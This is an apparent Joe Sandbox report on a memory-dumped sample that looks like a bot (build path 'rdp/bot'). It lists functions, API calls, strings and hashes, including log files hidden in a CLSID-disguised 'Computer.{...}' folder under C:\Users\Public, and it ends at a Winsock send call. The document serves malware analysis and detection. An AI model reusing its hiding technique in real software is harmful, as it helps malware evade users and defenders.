[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11BDD1C9, 00007FFE11BDD1FC, 00007FFE11BDD22F
(sec != NULL), xrefs: 00007FFE11BDD221
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11BDD1B4, 00007FFE11BDD1E7, 00007FFE11BDD21A
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE11BDD2CB

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: cdad1e16d434cd18abeb0963fc75aef5f7df0e511999ceea25923137117deeeb
Instruction ID: 2c725ca7a9d11cbd4244262dc490139ededfab8f73a3f1e06081bda7a2781499
Opcode Fuzzy Hash: cdad1e16d434cd18abeb0963fc75aef5f7df0e511999ceea25923137117deeeb
Instruction Fuzzy Hash: 924114A1A0DA87D1FF349F52E841BF82368AB04378F4461B6DA9D1A5B5DF3CEA45D300

Function 00007FFE126E16D9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE126E17CD

Strings

ini_get_sec, xrefs: 00007FFE126E1722, 00007FFE126E1755, 00007FFE126E1788, 00007FFE126E17E6, 00007FFE126E1824
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE126E182B
(name != NULL), xrefs: 00007FFE126E174E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126E1729, 00007FFE126E175C, 00007FFE126E178F
NULL, xrefs: 00007FFE126E1844
(sec != NULL), xrefs: 00007FFE126E1781
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126E1714, 00007FFE126E1747, 00007FFE126E177A
[D] (%s) -> Done(name=%s), xrefs: 00007FFE126E17ED
(ini != NULL), xrefs: 00007FFE126E171B

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 34b49037a4cb7f7fc6fbca85d598d0711919c259c27d9113e61f5b93c9623b77
Instruction ID: 45646572395697d03f347989701972c70b844214f9107c310afbe5fe076d559c
Opcode Fuzzy Hash: 34b49037a4cb7f7fc6fbca85d598d0711919c259c27d9113e61f5b93c9623b77
Instruction Fuzzy Hash: 1C4126A1A0CE87D5FF50DB42AC517F52250BB107A8F4440B6DA5C0A9F9EFFCAA4AD304

Function 00007FFE1A5280C9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1A5281BD

Strings

[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE1A52821B
(ini != NULL), xrefs: 00007FFE1A52810B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A528104, 00007FFE1A528137, 00007FFE1A52816A
(name != NULL), xrefs: 00007FFE1A52813E
ini_get_sec, xrefs: 00007FFE1A528112, 00007FFE1A528145, 00007FFE1A528178, 00007FFE1A5281D6, 00007FFE1A528214
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A528119, 00007FFE1A52814C, 00007FFE1A52817F
[D] (%s) -> Done(name=%s), xrefs: 00007FFE1A5281DD
(sec != NULL), xrefs: 00007FFE1A528171
NULL, xrefs: 00007FFE1A528234

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: cbae729921808903d89f924af3bb35677f728475178ab91845b5bdec3c6d4aa5
Instruction ID: 2cfafb641b4de977177268e639f34e67bcf37b9737a8eaf5da67d2bca2ad2fed
Opcode Fuzzy Hash: cbae729921808903d89f924af3bb35677f728475178ab91845b5bdec3c6d4aa5
Instruction Fuzzy Hash: FF410B61F0CE47D1FA12CB92E9503B52261AF92B68F4440F3EA0D065B1DF3CE946D340

Function 00007FFE11504B19 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11504C0D

Strings

NULL, xrefs: 00007FFE11504C84
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11504B69, 00007FFE11504B9C, 00007FFE11504BCF
(name != NULL), xrefs: 00007FFE11504B8E
(ini != NULL), xrefs: 00007FFE11504B5B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11504B54, 00007FFE11504B87, 00007FFE11504BBA
[D] (%s) -> Done(name=%s), xrefs: 00007FFE11504C2D
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE11504C6B
(sec != NULL), xrefs: 00007FFE11504BC1
ini_get_sec, xrefs: 00007FFE11504B62, 00007FFE11504B95, 00007FFE11504BC8, 00007FFE11504C26, 00007FFE11504C64

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 4aa1df97a47ca316267ad6c5515689d8f9c9a5a1432f820d2ff1b5dd2c2cd85c
Instruction ID: c5d1b502c9dd27284cbc076ba2a6cd55f8eb92566a952fc8d7fc937ffd801374
Opcode Fuzzy Hash: 4aa1df97a47ca316267ad6c5515689d8f9c9a5a1432f820d2ff1b5dd2c2cd85c
Instruction Fuzzy Hash: 6F418061E0CE4795FB119FA2E8403B82659BF5136CF4881FADA1D0A1B1DF7CE64AC340

Function 00007FF7C1AB13CD Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB13D8
strlen.MSVCRT ref: 00007FF7C1AB13F4
strlen.MSVCRT ref: 00007FF7C1AB1400
strlen.MSVCRT ref: 00007FF7C1AB148A
strlen.MSVCRT ref: 00007FF7C1AB14B7

Strings

tch.pkg, xrefs: 00007FF7C1AB1457
pkg, xrefs: 00007FF7C1AB1416
update.p, xrefs: 00007FF7C1AB1409
????-pat, xrefs: 00007FF7C1AB144A
.applied, xrefs: 00007FF7C1AB1492

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen
String ID: .applied$????-pat$pkg$tch.pkg$update.p
API String ID: 39653677-1686225151
Opcode ID: 90beea7e8383602f11ba928d37b552c868a860ea5da908b62ebdf329eea09240
Instruction ID: 7526bf0db11373b2bc3809e9e36e8b76b97d9fc5a62671ed7be948ab6da75e35
Opcode Fuzzy Hash: 90beea7e8383602f11ba928d37b552c868a860ea5da908b62ebdf329eea09240
Instruction Fuzzy Hash: 2B210B7290CBC345FB20FE15B804B7D9A904B16BE8FC88032DD0E5B793DDACA8548361

Function 00007FFE1A4F1352 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1A4F13FE
fflush.MSVCRT ref: 00007FFE1A4F140A
EnterCriticalSection.KERNEL32 ref: 00007FFE1A4F1423
LeaveCriticalSection.KERNEL32 ref: 00007FFE1A4F144B
CopyFileA.KERNEL32 ref: 00007FFE1A4F14A8

Strings

1, xrefs: 00007FFE1A4F1492
., xrefs: 00007FFE1A4F148D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE1A4F146B

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
API String ID: 513531256-2729875187
Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
Instruction ID: f99a5d857b5765848f4539af630d82fa6adbb87993f446c2452b4fe9c1d2a4c8
Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
Instruction Fuzzy Hash: D9416C71B0CA4586F320AB17EAA03FE2260AB96FA4F5040F3DA4D577B5DF2CE5858700

Function 00007FFE126E2072 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE126E211E
fflush.MSVCRT ref: 00007FFE126E212A
EnterCriticalSection.KERNEL32 ref: 00007FFE126E2143
LeaveCriticalSection.KERNEL32 ref: 00007FFE126E216B
CopyFileA.KERNEL32 ref: 00007FFE126E21C8

Strings

., xrefs: 00007FFE126E21AD
1, xrefs: 00007FFE126E21B2
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFE126E218B

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
API String ID: 513531256-1680544107
Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
Instruction ID: 2f91b9f264d6804011115b047d715351ea34905a29cc2fe1fb90709bae031e44
Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
Instruction Fuzzy Hash: 8F418621A0CE8246FB20DB12EC643F92391BB987A0F5001B5DA0D477F5CFBCE6458748

Function 00007FFE1A5277A2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1A52784E
fflush.MSVCRT ref: 00007FFE1A52785A
EnterCriticalSection.KERNEL32 ref: 00007FFE1A527873
LeaveCriticalSection.KERNEL32 ref: 00007FFE1A52789B
CopyFileA.KERNEL32 ref: 00007FFE1A5278F8

Strings

1, xrefs: 00007FFE1A5278E2
., xrefs: 00007FFE1A5278DD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE1A5278BB

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
API String ID: 513531256-3034662401
Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
Instruction ID: d8d13a389f0c98023c723322d2c90abe3455b60ebb1b693989feda0ffcb7a7e3
Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
Instruction Fuzzy Hash: 70415E62B0CE419AF320AB52E8543FA6261AFD6FA0F5000F7DA4D477A5DF3CE545C640

Function 00007FFE115040D2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1150417E
fflush.MSVCRT ref: 00007FFE1150418A
EnterCriticalSection.KERNEL32 ref: 00007FFE115041A3
LeaveCriticalSection.KERNEL32 ref: 00007FFE115041CB
CopyFileA.KERNEL32 ref: 00007FFE11504228

Strings

1, xrefs: 00007FFE11504212
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE115041EB
., xrefs: 00007FFE1150420D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
API String ID: 513531256-2115573132
Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
Instruction ID: cbb84ec3c0ee27ab64d3569b27f11ffeeaa09dfb884190c1ff80fe121be04b2f
Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
Instruction Fuzzy Hash: 9541BF71A0CE828AF321AB56E8443FE679AFB947A0F5001B4DA4D477B5CF7CE9858700

Function 00007FFE11EC9DC2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE11EC9E6E
fflush.MSVCRT ref: 00007FFE11EC9E7A
EnterCriticalSection.KERNEL32 ref: 00007FFE11EC9E93
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC9EBB
CopyFileA.KERNEL32 ref: 00007FFE11EC9F18

Strings

., xrefs: 00007FFE11EC9EFD
1, xrefs: 00007FFE11EC9F02
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE11EC9EDB

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
API String ID: 513531256-2601447032
Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
Instruction ID: 929600df4509480c34adee906357661c9a0c6b851f52e2ffe05620e7123312d4
Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
Instruction Fuzzy Hash: C6418221A0CA8186FB20ABD6EC503BF22A9FB947A0F8411B5D94D877A5DF2DE5958700

Function 00007FFE1A528600 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1A52869A
_errno.MSVCRT ref: 00007FFE1A5286B8
_errno.MSVCRT ref: 00007FFE1A5286C4

Strings

(value != NULL), xrefs: 00007FFE1A528672
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A52866B
ini_get_uint32, xrefs: 00007FFE1A528679, 00007FFE1A5286E4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A528680
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1A5286EB

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 823f9eb139ee9fd81949df31d6533de7a7a8e4b7c39e6833e41002169308d720
Instruction ID: fd52d98c42b88982431593d718b7f4caa82c5c1759468377fbf2915be2d66ba6
Opcode Fuzzy Hash: 823f9eb139ee9fd81949df31d6533de7a7a8e4b7c39e6833e41002169308d720
Instruction Fuzzy Hash: E2217E62B0CE4396E751DF96E8407BA2361AB96FA4F4440B7EE4C47664DF3CE945C700

Function 00007FF7C1AB5B79 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF7C1AB5C17
GetLastError.KERNEL32 ref: 00007FF7C1AB5C32

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

NULL, xrefs: 00007FF7C1AB5D75, 00007FF7C1AB5D81
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF7C1AB5C50
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF7C1AB5BED
fs_file_copy, xrefs: 00007FF7C1AB5BE6, 00007FF7C1AB5C49, 00007FF7C1AB5D97
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF7C1AB5D9E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 4b4899b335b3e6d97c7936ea7dc83b6c3e1e4cd9547a80d32ae369b40ccdf5eb
Instruction ID: d1c2ff1e74aa88b346367e45ee156a133fe501e86f3257471b68ee716d8ab250
Opcode Fuzzy Hash: 4b4899b335b3e6d97c7936ea7dc83b6c3e1e4cd9547a80d32ae369b40ccdf5eb
Instruction Fuzzy Hash: AB416C7190C69AC6FB24EF06A400B7DE6517F01BA8ED40133DD0E07690FEEDA686CA21

Function 00007FF7C1AB55AD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,?,?,00007FF7C1AB6311), ref: 00007FF7C1AB55C4
GetLastError.KERNEL32 ref: 00007FF7C1AB561B

Strings

NULL, xrefs: 00007FF7C1AB574A
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB5604
fs_file_delete, xrefs: 00007FF7C1AB55FD, 00007FF7C1AB5629, 00007FF7C1AB5759
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB5630
[I] (%s) -> Done(path=%s), xrefs: 00007FF7C1AB5760

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 2047d60fb5c13c1989b6da97ae385802d0952076c86f5f41a327e2344636ab28
Instruction ID: 963c44d317de6452627089f16c1d20cf912ac47ed0d89bdde58ab5eaf15c6c96
Opcode Fuzzy Hash: 2047d60fb5c13c1989b6da97ae385802d0952076c86f5f41a327e2344636ab28
Instruction Fuzzy Hash: 5D31C572E0C28AC2FB60FF18A450EBCA1525F51375EE80533CD1E472D1ED9DA9859722

Function 00007FFE126E2F7D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFE126E2FCB
WSAGetLastError.WS2_32 ref: 00007FFE126E2FDA

